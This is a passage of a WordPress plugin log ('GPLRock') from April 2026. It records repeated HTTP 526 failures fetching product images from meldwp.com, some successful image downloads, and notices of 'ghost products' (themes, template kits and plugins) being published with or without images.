Error: . Retrying... [05-Apr-2026 12:51:45 UTC] GPLRock: Image download failed for product playlab-on-demand-movie-streaming-platform (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 12:51:47 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/playlab---on-demand-movie-streaming-platform-27408.webp for product playlab-on-demand-movie-streaming-platform after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 12:51:47 UTC] GPLRock: Image download failed for product playlab-on-demand-movie-streaming-platform (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 12:51:49 UTC] GPLRock: Image download failed for product playlab-on-demand-movie-streaming-platform (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 12:51:52 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/playlab---on-demand-movie-streaming-platform-27408.webp for product playlab-on-demand-movie-streaming-platform after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 12:51:52 UTC] GPLRock WARNING: Image download failed for product playlab-on-demand-movie-streaming-platform. URL: https://meldwp.com/wp-content/uploads/playlab---on-demand-movie-streaming-platform-27408.webp [05-Apr-2026 12:51:52 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: playlab-on-demand-movie-streaming-platform [05-Apr-2026 12:51:52 UTC] GPLRock: Image download failed for product woocommerce-sale-badge (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 12:51:54 UTC] GPLRock: Image download failed for product woocommerce-sale-badge (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 12:51:56 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/woocommerce-sale-badge-3416.webp for product woocommerce-sale-badge after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 12:51:56 UTC] GPLRock: Image download failed for product woocommerce-sale-badge (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 12:51:58 UTC] GPLRock: Image download failed for product woocommerce-sale-badge (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 12:52:00 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/woocommerce-sale-badge-3416.webp for product woocommerce-sale-badge after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 12:52:00 UTC] GPLRock WARNING: Image download failed for product woocommerce-sale-badge. URL: https://meldwp.com/wp-content/uploads/woocommerce-sale-badge-3416.webp [05-Apr-2026 12:52:00 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: woocommerce-sale-badge [05-Apr-2026 12:52:00 UTC] GPLRock: Image download failed for product bitcoin-ethereum-erc20-crypto-wallets-with-exchange (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 12:52:02 UTC] GPLRock: Image download failed for product bitcoin-ethereum-erc20-crypto-wallets-with-exchange (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 12:52:05 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/bitcoin-ethereum-erc20-crypto-wallets-with-exchange-16560.webp for product bitcoin-ethereum-erc20-crypto-wallets-with-exchange after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 12:52:05 UTC] GPLRock: Image download failed for product bitcoin-ethereum-erc20-crypto-wallets-with-exchange (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 12:52:07 UTC] GPLRock: Image download failed for product bitcoin-ethereum-erc20-crypto-wallets-with-exchange (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 12:52:09 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/bitcoin-ethereum-erc20-crypto-wallets-with-exchange-16560.webp for product bitcoin-ethereum-erc20-crypto-wallets-with-exchange after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 12:52:09 UTC] GPLRock WARNING: Image download failed for product bitcoin-ethereum-erc20-crypto-wallets-with-exchange. URL: https://meldwp.com/wp-content/uploads/bitcoin-ethereum-erc20-crypto-wallets-with-exchange-16560.webp [05-Apr-2026 12:52:09 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: bitcoin-ethereum-erc20-crypto-wallets-with-exchange [05-Apr-2026 12:52:09 UTC] GPLRock: Image download failed for product real-estate-portal-for-wordpress (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 12:52:11 UTC] GPLRock: Image download failed for product real-estate-portal-for-wordpress (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 12:52:13 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/real-estate-portal-for-wordpress-1716.webp for product real-estate-portal-for-wordpress after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 12:52:13 UTC] GPLRock: Image download failed for product real-estate-portal-for-wordpress (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 12:52:15 UTC] GPLRock: Image download failed for product real-estate-portal-for-wordpress (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 12:52:18 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/real-estate-portal-for-wordpress-1716.webp for product real-estate-portal-for-wordpress after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 12:52:18 UTC] GPLRock WARNING: Image download failed for product real-estate-portal-for-wordpress. URL: https://meldwp.com/wp-content/uploads/real-estate-portal-for-wordpress-1716.webp [05-Apr-2026 12:52:18 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: real-estate-portal-for-wordpress [05-Apr-2026 12:52:33 UTC] GPLRock: Image downloaded successfully for product reach-digital-agency-creative-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-2842c56d.webp [05-Apr-2026 12:52:33 UTC] GPLRock: Using pre-downloaded image for product reach-digital-agency-creative-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-2842c56d.webp [05-Apr-2026 12:52:33 UTC] GPLRock: Ghost product published with image - Product ID: reach-digital-agency-creative-elementor-template-kit [05-Apr-2026 12:52:35 UTC] GPLRock: Image downloaded successfully for product randai-theater-entertainment-performing-arts-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-e18d4a42.webp [05-Apr-2026 12:52:35 UTC] GPLRock: Using pre-downloaded image for product randai-theater-entertainment-performing-arts-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-e18d4a42.webp [05-Apr-2026 12:52:35 UTC] GPLRock: Ghost product published with image - Product ID: randai-theater-entertainment-performing-arts-elementor-template-kit [05-Apr-2026 12:52:36 UTC] GPLRock: Image downloaded successfully for product raint-digital-agency-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-be53b6ec.webp [05-Apr-2026 12:52:36 UTC] GPLRock: Using pre-downloaded image for product raint-digital-agency-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-be53b6ec.webp [05-Apr-2026 12:52:36 UTC] GPLRock: Ghost product published with image - Product ID: raint-digital-agency-elementor-template-kit [05-Apr-2026 12:52:38 UTC] GPLRock: Image downloaded successfully for product rabio-wedding-event-organizer-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-0ae3def0.webp [05-Apr-2026 12:52:38 UTC] GPLRock: Using pre-downloaded image for product rabio-wedding-event-organizer-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-0ae3def0.webp [05-Apr-2026 12:52:38 UTC] GPLRock: Ghost product published with image - Product ID: rabio-wedding-event-organizer-elementor-template-kit [05-Apr-2026 12:52:39 UTC] GPLRock: Image downloaded successfully for product quwa-cv-resume-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-28380509.webp [05-Apr-2026 12:52:39 UTC] GPLRock: Using pre-downloaded image for product quwa-cv-resume-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-28380509.webp [05-Apr-2026 12:52:39 UTC] GPLRock: Ghost product published with image - Product ID: quwa-cv-resume-template-kit [05-Apr-2026 12:52:40 UTC] GPLRock: Image downloaded successfully for product qurux-dermatology-skin-care-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-5d7eaded.webp [05-Apr-2026 12:52:40 UTC] GPLRock: Using pre-downloaded image for product qurux-dermatology-skin-care-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-5d7eaded.webp [05-Apr-2026 12:52:40 UTC] GPLRock: Ghost product published with image - Product ID: qurux-dermatology-skin-care-elementor-template-kit [05-Apr-2026 12:52:41 UTC] GPLRock: Image downloaded successfully for product quiff-barbershop-hairdresser-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-53922904.webp [05-Apr-2026 12:52:41 UTC] GPLRock: Using pre-downloaded image for product quiff-barbershop-hairdresser-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-53922904.webp [05-Apr-2026 12:52:41 UTC] GPLRock: Ghost product published with image - Product ID: quiff-barbershop-hairdresser-elementor-template-kit [05-Apr-2026 12:52:43 UTC] GPLRock: Image downloaded successfully for product quick-call-call-center-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-ba15c13e.webp [05-Apr-2026 12:52:43 UTC] GPLRock: Using pre-downloaded image for product quick-call-call-center-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-ba15c13e.webp [05-Apr-2026 12:52:43 UTC] GPLRock: Ghost product published with image - Product ID: quick-call-call-center-elementor-template-kit [05-Apr-2026 12:52:44 UTC] GPLRock: Image downloaded successfully for product queak-cleaning-service-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-caa5e809.webp [05-Apr-2026 12:52:44 UTC] GPLRock: Using pre-downloaded image for product queak-cleaning-service-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-caa5e809.webp [05-Apr-2026 12:52:44 UTC] GPLRock: Ghost product published with image - Product ID: queak-cleaning-service-elementor-template-kit [05-Apr-2026 12:52:46 UTC] GPLRock: Image downloaded successfully for product qourse-education-online-course-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-87259f01.webp [05-Apr-2026 12:52:46 UTC] GPLRock: Using pre-downloaded image for product qourse-education-online-course-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-87259f01.webp [05-Apr-2026 12:52:46 UTC] GPLRock: Ghost product published with image - Product ID: qourse-education-online-course-elementor-template-kit [05-Apr-2026 12:53:42 UTC] GPLRock: Image download failed for product rolanda-restaurant-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 12:53:44 UTC] GPLRock: Image download failed for product rolanda-restaurant-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 12:53:46 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/rolanda---restaurant-wordpress-theme-3724.webp for product rolanda-restaurant-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 12:53:46 UTC] GPLRock: Image download failed for product rolanda-restaurant-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 12:53:48 UTC] GPLRock: Image download failed for product rolanda-restaurant-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 12:53:50 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/rolanda---restaurant-wordpress-theme-3724.webp for product rolanda-restaurant-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 12:53:50 UTC] GPLRock WARNING: Image download failed for product rolanda-restaurant-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/rolanda---restaurant-wordpress-theme-3724.webp [05-Apr-2026 12:53:50 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: rolanda-restaurant-wordpress-theme [05-Apr-2026 12:53:50 UTC] GPLRock: Image download failed for product covina-business-consulting-and-professional-services-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 12:53:53 UTC] GPLRock: Image download failed for product covina-business-consulting-and-professional-services-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 12:53:55 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/covina---business-consulting-and-professional-services-wordpress-theme-27320.webp for product covina-business-consulting-and-professional-services-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 12:53:55 UTC] GPLRock: Image download failed for product covina-business-consulting-and-professional-services-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 12:53:57 UTC] GPLRock: Image download failed for product covina-business-consulting-and-professional-services-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 12:53:59 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/covina---business-consulting-and-professional-services-wordpress-theme-27320.webp for product covina-business-consulting-and-professional-services-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 12:53:59 UTC] GPLRock WARNING: Image download failed for product covina-business-consulting-and-professional-services-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/covina---business-consulting-and-professional-services-wordpress-theme-27320.webp [05-Apr-2026 12:53:59 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: covina-business-consulting-and-professional-services-wordpress-theme [05-Apr-2026 12:53:59 UTC] GPLRock: Image download failed for product incharity-fundraising-non-profit-organization-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 12:54:01 UTC] GPLRock: Image download failed for product incharity-fundraising-non-profit-organization-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 12:54:03 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/incharity--fundraising-non-profit-organization-wordpress-theme-24359.webp for product incharity-fundraising-non-profit-organization-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 12:54:04 UTC] GPLRock: Image download failed for product incharity-fundraising-non-profit-organization-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 12:54:06 UTC] GPLRock: Image download failed for product incharity-fundraising-non-profit-organization-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 12:54:08 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/incharity--fundraising-non-profit-organization-wordpress-theme-24359.webp for product incharity-fundraising-non-profit-organization-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 12:54:08 UTC] GPLRock WARNING: Image download failed for product incharity-fundraising-non-profit-organization-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/incharity--fundraising-non-profit-organization-wordpress-theme-24359.webp [05-Apr-2026 12:54:08 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: incharity-fundraising-non-profit-organization-wordpress-theme [05-Apr-2026 12:54:08 UTC] GPLRock: Image download failed for product kimberly-wordpress-blog-shop-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 12:54:10 UTC] GPLRock: Image download failed for product kimberly-wordpress-blog-shop-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 12:54:12 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/kimberly---wordpress-blog--shop-theme-29506.webp for product kimberly-wordpress-blog-shop-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 12:54:12 UTC] GPLRock: Image download failed for product kimberly-wordpress-blog-shop-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 12:54:14 UTC] GPLRock: Image download failed for product kimberly-wordpress-blog-shop-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 12:54:16 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/kimberly---wordpress-blog--shop-theme-29506.webp for product kimberly-wordpress-blog-shop-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 12:54:16 UTC] GPLRock WARNING: Image download failed for product kimberly-wordpress-blog-shop-theme. URL: https://meldwp.com/wp-content/uploads/kimberly---wordpress-blog--shop-theme-29506.webp [05-Apr-2026 12:54:16 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: kimberly-wordpress-blog-shop-theme [05-Apr-2026 12:54:17 UTC] GPLRock: Image download failed for product shakti-church-religion-nonprofit-krishna-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 12:54:19 UTC] GPLRock: Image download failed for product shakti-church-religion-nonprofit-krishna-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 12:54:21 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/shakti---church--religion-nonprofit-krishna-wordpress-theme-17514.webp for product shakti-church-religion-nonprofit-krishna-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 12:54:21 UTC] GPLRock: Image download failed for product shakti-church-religion-nonprofit-krishna-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 12:54:23 UTC] GPLRock: Image download failed for product shakti-church-religion-nonprofit-krishna-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 12:54:25 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/shakti---church--religion-nonprofit-krishna-wordpress-theme-17514.webp for product shakti-church-religion-nonprofit-krishna-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 12:54:25 UTC] GPLRock WARNING: Image download failed for product shakti-church-religion-nonprofit-krishna-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/shakti---church--religion-nonprofit-krishna-wordpress-theme-17514.webp [05-Apr-2026 12:54:25 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: shakti-church-religion-nonprofit-krishna-wordpress-theme [05-Apr-2026 12:54:25 UTC] GPLRock: Image download failed for product hostwind-hosting-wordpress-theme-with-whmcs (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 12:54:27 UTC] GPLRock: Image download failed for product hostwind-hosting-wordpress-theme-with-whmcs (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 12:54:29 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/hostwind---hosting-wordpress-theme-with-whmcs-11885.webp for product hostwind-hosting-wordpress-theme-with-whmcs after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 12:54:30 UTC] GPLRock: Image download failed for product hostwind-hosting-wordpress-theme-with-whmcs (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 12:54:32 UTC] GPLRock: Image download failed for product hostwind-hosting-wordpress-theme-with-whmcs (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 12:54:34 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/hostwind---hosting-wordpress-theme-with-whmcs-11885.webp for product hostwind-hosting-wordpress-theme-with-whmcs after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 12:54:34 UTC] GPLRock WARNING: Image download failed for product hostwind-hosting-wordpress-theme-with-whmcs. URL: https://meldwp.com/wp-content/uploads/hostwind---hosting-wordpress-theme-with-whmcs-11885.webp [05-Apr-2026 12:54:34 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: hostwind-hosting-wordpress-theme-with-whmcs [05-Apr-2026 12:54:34 UTC] GPLRock: Image download failed for product coworker-responsive-multipurpose-template (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 12:54:36 UTC] GPLRock: Image download failed for product coworker-responsive-multipurpose-template (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 12:54:38 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/coworker---responsive-multipurpose-template-6414.webp for product coworker-responsive-multipurpose-template after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 12:54:38 UTC] GPLRock: Image download failed for product coworker-responsive-multipurpose-template (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 12:54:40 UTC] GPLRock: Image download failed for product coworker-responsive-multipurpose-template (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 12:54:43 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/coworker---responsive-multipurpose-template-6414.webp for product coworker-responsive-multipurpose-template after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 12:54:43 UTC] GPLRock WARNING: Image download failed for product coworker-responsive-multipurpose-template. URL: https://meldwp.com/wp-content/uploads/coworker---responsive-multipurpose-template-6414.webp [05-Apr-2026 12:54:43 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: coworker-responsive-multipurpose-template [05-Apr-2026 12:54:43 UTC] GPLRock: Image download failed for product kuist-photography-series-portfolio-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 12:54:45 UTC] GPLRock: Image download failed for product kuist-photography-series-portfolio-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 12:54:47 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/kuist---photography-series-portfolio-wordpress-theme-30087.webp for product kuist-photography-series-portfolio-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 12:54:47 UTC] GPLRock: Image download failed for product kuist-photography-series-portfolio-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 12:54:50 UTC] GPLRock: Image download failed for product kuist-photography-series-portfolio-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 12:54:52 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/kuist---photography-series-portfolio-wordpress-theme-30087.webp for product kuist-photography-series-portfolio-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 12:54:52 UTC] GPLRock WARNING: Image download failed for product kuist-photography-series-portfolio-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/kuist---photography-series-portfolio-wordpress-theme-30087.webp [05-Apr-2026 12:54:52 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: kuist-photography-series-portfolio-wordpress-theme [05-Apr-2026 12:54:52 UTC] GPLRock: Image download failed for product medi-plus-health-care-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 12:54:54 UTC] GPLRock: Image download failed for product medi-plus-health-care-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 12:54:56 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/medi-plus---health-care-wordpress-theme-21799.webp for product medi-plus-health-care-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 12:54:56 UTC] GPLRock: Image download failed for product medi-plus-health-care-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 12:54:58 UTC] GPLRock: Image download failed for product medi-plus-health-care-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 12:55:00 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/medi-plus---health-care-wordpress-theme-21799.webp for product medi-plus-health-care-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 12:55:00 UTC] GPLRock WARNING: Image download failed for product medi-plus-health-care-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/medi-plus---health-care-wordpress-theme-21799.webp [05-Apr-2026 12:55:00 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: medi-plus-health-care-wordpress-theme [05-Apr-2026 12:55:00 UTC] GPLRock: Image download failed for product gokha-minimal-portfolio-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 12:55:03 UTC] GPLRock: Image download failed for product gokha-minimal-portfolio-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 12:55:05 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/gokha---minimal-portfolio-wordpress-theme-32351.webp for product gokha-minimal-portfolio-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 12:55:05 UTC] GPLRock: Image download failed for product gokha-minimal-portfolio-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 12:55:07 UTC] GPLRock: Image download failed for product gokha-minimal-portfolio-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 12:55:09 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/gokha---minimal-portfolio-wordpress-theme-32351.webp for product gokha-minimal-portfolio-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 12:55:09 UTC] GPLRock WARNING: Image download failed for product gokha-minimal-portfolio-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/gokha---minimal-portfolio-wordpress-theme-32351.webp [05-Apr-2026 12:55:09 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: gokha-minimal-portfolio-wordpress-theme [05-Apr-2026 12:55:33 UTC] GPLRock: Image download failed for product ninja-forms-asana-integration (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 12:55:35 UTC] GPLRock: Image download failed for product ninja-forms-asana-integration (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 12:55:37 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/ninja-forms-asana-integration-22095.webp for product ninja-forms-asana-integration after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 12:55:37 UTC] GPLRock: Image download failed for product ninja-forms-asana-integration (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 12:55:39 UTC] GPLRock: Image download failed for product ninja-forms-asana-integration (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 12:55:41 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/ninja-forms-asana-integration-22095.webp for product ninja-forms-asana-integration after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 12:55:41 UTC] GPLRock WARNING: Image download failed for product ninja-forms-asana-integration. URL: https://meldwp.com/wp-content/uploads/ninja-forms-asana-integration-22095.webp [05-Apr-2026 12:55:42 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: ninja-forms-asana-integration [05-Apr-2026 12:55:42 UTC] GPLRock: Image download failed for product pandemic-spread-simulation-social-experiment (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 12:55:44 UTC] GPLRock: Image download failed for product pandemic-spread-simulation-social-experiment (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 12:55:46 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/pandemic-spread-simulation---social-experiment-7372.webp for product pandemic-spread-simulation-social-experiment after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 12:55:46 UTC] GPLRock: Image download failed for product pandemic-spread-simulation-social-experiment (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 12:55:48 UTC] GPLRock: Image download failed for product pandemic-spread-simulation-social-experiment (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 12:55:50 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/pandemic-spread-simulation---social-experiment-7372.webp for product pandemic-spread-simulation-social-experiment after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 12:55:50 UTC] GPLRock WARNING: Image download failed for product pandemic-spread-simulation-social-experiment. URL: https://meldwp.com/wp-content/uploads/pandemic-spread-simulation---social-experiment-7372.webp [05-Apr-2026 12:55:50 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: pandemic-spread-simulation-social-experiment [05-Apr-2026 12:55:50 UTC] GPLRock: Image download failed for product wp-file-manager-file-management-system (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 12:55:52 UTC] GPLRock: Image download failed for product wp-file-manager-file-management-system (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 12:55:55 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/wp-file-manager---file-management-system-3484.webp for product wp-file-manager-file-management-system after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 12:55:55 UTC] GPLRock: Image download failed for product wp-file-manager-file-management-system (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 12:55:57 UTC] GPLRock: Image download failed for product wp-file-manager-file-management-system (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 12:55:59 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/wp-file-manager---file-management-system-3484.webp for product 